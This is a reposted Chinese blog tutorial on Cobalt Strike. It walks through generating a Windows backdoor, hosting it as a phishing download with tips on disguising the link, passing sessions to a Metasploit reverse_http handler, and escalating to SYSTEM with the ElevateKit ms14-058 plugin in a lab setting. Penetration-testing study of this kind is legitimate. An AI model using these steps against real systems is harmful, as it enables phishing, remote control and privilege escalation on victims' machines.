Cobalt Strike渗透神器详解

2024-02-08 17:10

本文主要是介绍Cobalt Strike渗透神器详解,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Cobalt Strike

    • 前言
    • 简介
    • 功能使用
    • 下载与安装
    • 基础使用
    • CS如何成功上线
      • 所需环境
      • 添加监听
      • 生成后门木马
      • 钓鱼链接
      • 成功拿到shell
    • CS如何联动MSF
      • 所需环境
      • 前提条件
      • MSF配置监听模块
      • CS新建监听器
      • 成功交互
    • CS如何进行提权操作
      • 所需环境
      • 前提条件
      • 查看用户权限
      • 下载提权插件
      • 加载插件
      • 成功提权
    • CS小福利

前言

由于最近忙着考试复习和学习 (不排除偷懒水分😂),发现也是挺长时间没有好好更新文章了,思考了一晚上发现自律方面还有很大的进步空间啊,这边也是赶紧加班更新了一篇CS的使用呢,那就一起来学习一下叭😁;

简介

  • CS是一个常用的渗透测试工具,全称为"Cobalt Strike",它是一款针对渗透测试和红队操作而设计的工具,主要用于模拟攻击和检测网络安全漏洞,常被业界人称为CS神器;Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作;

功能使用

多功能性:CS提供了多种功能,包括端口扫描、漏洞扫描、远程控制、数据收集、密码破解等;
多平台支持:CS能够在多种操作系统上运行,包括Windows、Linux、Mac OS等;
多种协议支持:CS支持多种协议,包括TCP、UDP、HTTP、HTTPS、DNS等;
高度可定制化:CS的用户界面可以自定义,用户可以根据自己的需求来设置不同的选项和功能;
高度隐蔽性:CS能够伪装成各种流量,让攻击者很难被检测到;

下载与安装

  • 下载CS工具并将CS上传至kali机并进行解压;

在这里插入图片描述

  • 进入CS工具目录,简单介绍下大致的文件作用;

在这里插入图片描述

c2lint: 用于检查profile的错误异常
teamserver: 服务端程序
cobaltstrike,cobaltstrike.jar: 客户端程序(java跨平台)
logs: 目录记录与目标主机的相关信息
update,update.jar: 用于更新CS
third-party: 第三方工具
最核心的就是teamserver和cobaltstrike.jar: 分别是服务端和客户端

基础使用

  • 启动服务端;
#赋予服务器权限
chmod 777 teamserver
#启动cs服务器
./teamserver 服务端IP 密码

在这里插入图片描述

  • kali执行命令,启动客户端,记得也要先赋予权限才可执行;(注:这里有个小坑,不知道有木有中招的小伙伴,使用kali的终端执行该命令才可打开控制台,而通过SSH连接的终端连接不上)

在这里插入图片描述

  • 点击后会弹出一个服务指纹信息,点击是即可,成功连接上CS;

在这里插入图片描述
在这里插入图片描述

CS如何成功上线

所需环境

攻击机(kali)
目标靶机(win 10)

添加监听

  • 来到监听器位置Cobalt Strike —> Listeners

在这里插入图片描述

  • 点击下面的Listeners页面,接着添加Add配置信息;

在这里插入图片描述

生成后门木马

  • 选择生成攻击后门文件Attacks —> Packages —> Windows Executable

在这里插入图片描述
在这里插入图片描述

  • 将生成的木马文件保存到一个文件夹下;

在这里插入图片描述

钓鱼链接

  • 来到攻击模块Attacks —> Web drive-by —> Host file

在这里插入图片描述
在这里插入图片描述

  • 复制生成的链接;(注:小提一嘴,一般情况下直接发送链接很容易被识破,我们可以使用短链接生成器生成一个短链接,接着配合一些图片或页面,这样可以大大提高命中率,由于只是测试这里就不演示了哟,也是提供一个思路或方法

在这里插入图片描述

  • 将该恶意链接发送至目标靶机,当靶机用户访问时即会下载该木马文件;(注:需要关闭防火墙,杀毒软件等)

在这里插入图片描述

成功拿到shell

  • 假设靶机用户比较好奇,无意中点击执行了该恶意文件,返回到CS中可以看到目标已成功上线;

在这里插入图片描述

  • 拿到shell该怎么执行命令呢?别急别急,这就来了;

在这里插入图片描述

#查看IP信息
shell ipconfig
#查看用户
net user

在这里插入图片描述

  • 执行desktop命令,还可看到靶机用户桌面实时情况;

在这里插入图片描述

CS如何联动MSF

所需环境

攻击机(kali)
目标靶机(win 10)

前提条件

  • 必须确保目标靶机已成功上线,这里就不一一演示了哟;

在这里插入图片描述

MSF配置监听模块

  • kali打开msfconsole;

在这里插入图片描述

  • 设置模块,配置payload信息并执行攻击;
#使用监听模块
use exploit/multi/handler
#配置payload
set payload windows/meterpreter/reverse_http
#配置IP和端口
set lhost kali-ip
set lport 端口
#开始攻击
run/exploit

在这里插入图片描述

CS新建监听器

  • 在CS中新建一个监听器;

在这里插入图片描述

  • 配置一下基础的信息,值得注意的是IP和端口必须和msf监听的一致;

在这里插入图片描述

成功交互

  • 右击后点击Interact进入命令模式;

在这里插入图片描述

  • 接着点击Spawn添加,选择刚配置的监听payload;

在这里插入图片描述
在这里插入图片描述

  • 等待命令执行完即可;

在这里插入图片描述

  • 返回msf发现监听成功,成功进行交互;

在这里插入图片描述

CS如何进行提权操作

所需环境

攻击机(kali)
目标靶机(win 2008 R2)

前提条件

  • 还是必须确保目标靶机已成功上线哟;

在这里插入图片描述

查看用户权限

  • 打开视图命令,发现上线用户为普通用户;

在这里插入图片描述

  • 打开命令模式,执行getuid命令获取用户ID,有点慢稍等一会儿;

在这里插入图片描述

下载提权插件

  • CS里面含有自动化的提权,来到提权模块;

在这里插入图片描述

  • 默认提权的exp就只要下面这两个,肯定是不够的,所以得去加载一些提权的插件;

在这里插入图片描述

  • 下载ElevateKit提权插件;

在这里插入图片描述

  • 由于CS是在kali上,将该插件上传至kali以进行操作;

在这里插入图片描述

加载插件

  • 接下来加载插件,选择脚本管理模块;

在这里插入图片描述

  • 选择上传的插件,点击打开;

在这里插入图片描述

  • 打印出插件路径说明上传成功了;

在这里插入图片描述

  • 再次打开提权模块,发现EXP果然更多了;

在这里插入图片描述
在这里插入图片描述

成功提权

  • 选择好监听的目标和ms14-058EXP后,开始提权;(注:不同的靶机需要用到的提权exp是不一样的,这里的靶机环境为win 2008 R2)
  • 过程也是会比较慢的,等待一会后成功提权至system权限;

在这里插入图片描述

  • 进入命令模式,执行getuid命令查看当前用户成功提升至system权限;

在这里插入图片描述
还有一些其他的提权插件也还不错的,有兴趣可以下载试试;

https://github.com/DeEpinGh0st/Erebus

以上内容就是Cobalt Strike渗透神器的详细使用过程,当然还有很多其他的用法,后续也会慢慢更新喔,如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵一下,我也会慢慢去改进和提高的,请各位小伙伴多多支持,走之前别忘了点个赞哟😁!

CS小福利

关注微信公众号Joker零安全回复CS另附上工具精美礼品一份哟~

免责声明由于传播、利用本博客或微信公众号所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,Joker零安全及博客作者不为此承担任何责任,一旦造成后果请自行承担!

这篇关于Cobalt Strike渗透神器详解的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/691673

相关文章

Spring Security基于数据库验证流程详解

Spring Security 校验流程图 相关解释说明(认真看哦) AbstractAuthenticationProcessingFilter 抽象类 /*** 调用 #requiresAuthentication(HttpServletRequest, HttpServletResponse) 决定是否需要进行验证操作。* 如果需要验证,则会调用 #attemptAuthentica

OpenHarmony鸿蒙开发( Beta5.0)无感配网详解

1、简介 无感配网是指在设备联网过程中无需输入热点相关账号信息,即可快速实现设备配网,是一种兼顾高效性、可靠性和安全性的配网方式。 2、配网原理 2.1 通信原理 手机和智能设备之间的信息传递,利用特有的NAN协议实现。利用手机和智能设备之间的WiFi 感知订阅、发布能力,实现了数字管家应用和设备之间的发现。在完成设备间的认证和响应后,即可发送相关配网数据。同时还支持与常规Sof

6.1.数据结构-c/c++堆详解下篇(堆排序,TopK问题)

上篇:6.1.数据结构-c/c++模拟实现堆上篇(向下,上调整算法,建堆,增删数据)-CSDN博客 本章重点 1.使用堆来完成堆排序 2.使用堆解决TopK问题 目录 一.堆排序 1.1 思路 1.2 代码 1.3 简单测试 二.TopK问题 2.1 思路(求最小): 2.2 C语言代码(手写堆) 2.3 C++代码(使用优先级队列 priority_queue)

K8S(Kubernetes)开源的容器编排平台安装步骤详解

K8S(Kubernetes)是一个开源的容器编排平台,用于自动化部署、扩展和管理容器化应用程序。以下是K8S容器编排平台的安装步骤、使用方式及特点的概述: 安装步骤: 安装Docker:K8S需要基于Docker来运行容器化应用程序。首先要在所有节点上安装Docker引擎。 安装Kubernetes Master:在集群中选择一台主机作为Master节点,安装K8S的控制平面组件,如AP

嵌入式Openharmony系统构建与启动详解

大家好,今天主要给大家分享一下,如何构建Openharmony子系统以及系统的启动过程分解。 第一:OpenHarmony系统构建      首先熟悉一下,构建系统是一种自动化处理工具的集合,通过将源代码文件进行一系列处理,最终生成和用户可以使用的目标文件。这里的目标文件包括静态链接库文件、动态链接库文件、可执行文件、脚本文件、配置文件等。      我们在编写hellowor

LabVIEW FIFO详解

在LabVIEW的FPGA开发中,FIFO(先入先出队列)是常用的数据传输机制。通过配置FIFO的属性,工程师可以在FPGA和主机之间,或不同FPGA VIs之间进行高效的数据传输。根据具体需求,FIFO有多种类型与实现方式,包括目标范围内FIFO(Target-Scoped)、DMA FIFO以及点对点流(Peer-to-Peer)。 FIFO类型 **目标范围FIFO(Target-Sc

019、JOptionPane类的常用静态方法详解

目录 JOptionPane类的常用静态方法详解 1. showInputDialog()方法 1.1基本用法 1.2带有默认值的输入框 1.3带有选项的输入对话框 1.4自定义图标的输入对话框 2. showConfirmDialog()方法 2.1基本用法 2.2自定义按钮和图标 2.3带有自定义组件的确认对话框 3. showMessageDialog()方法 3.1

脏页的标记方式详解

脏页的标记方式 一、引言 在数据库系统中,脏页是指那些被修改过但还未写入磁盘的数据页。为了有效地管理这些脏页并确保数据的一致性,数据库需要对脏页进行标记。了解脏页的标记方式对于理解数据库的内部工作机制和优化性能至关重要。 二、脏页产生的过程 当数据库中的数据被修改时,这些修改首先会在内存中的缓冲池(Buffer Pool)中进行。例如,执行一条 UPDATE 语句修改了某一行数据,对应的缓

OmniGlue论文详解(特征匹配)

OmniGlue论文详解(特征匹配) 摘要1. 引言2. 相关工作2.1. 广义局部特征匹配2.2. 稀疏可学习匹配2.3. 半稠密可学习匹配2.4. 与其他图像表示匹配 3. OmniGlue3.1. 模型概述3.2. OmniGlue 细节3.2.1. 特征提取3.2.2. 利用DINOv2构建图形。3.2.3. 信息传播与新的指导3.2.4. 匹配层和损失函数3.2.5. 与Super

web群集--nginx配置文件location匹配符的优先级顺序详解及验证

文章目录 前言优先级顺序优先级顺序(详解)1. 精确匹配(Exact Match)2. 正则表达式匹配(Regex Match)3. 前缀匹配(Prefix Match) 匹配规则的综合应用验证优先级 前言 location的作用 在 NGINX 中,location 指令用于定义如何处理特定的请求 URI。由于网站往往需要不同的处理方式来适应各种请求,NGINX 提供了多种匹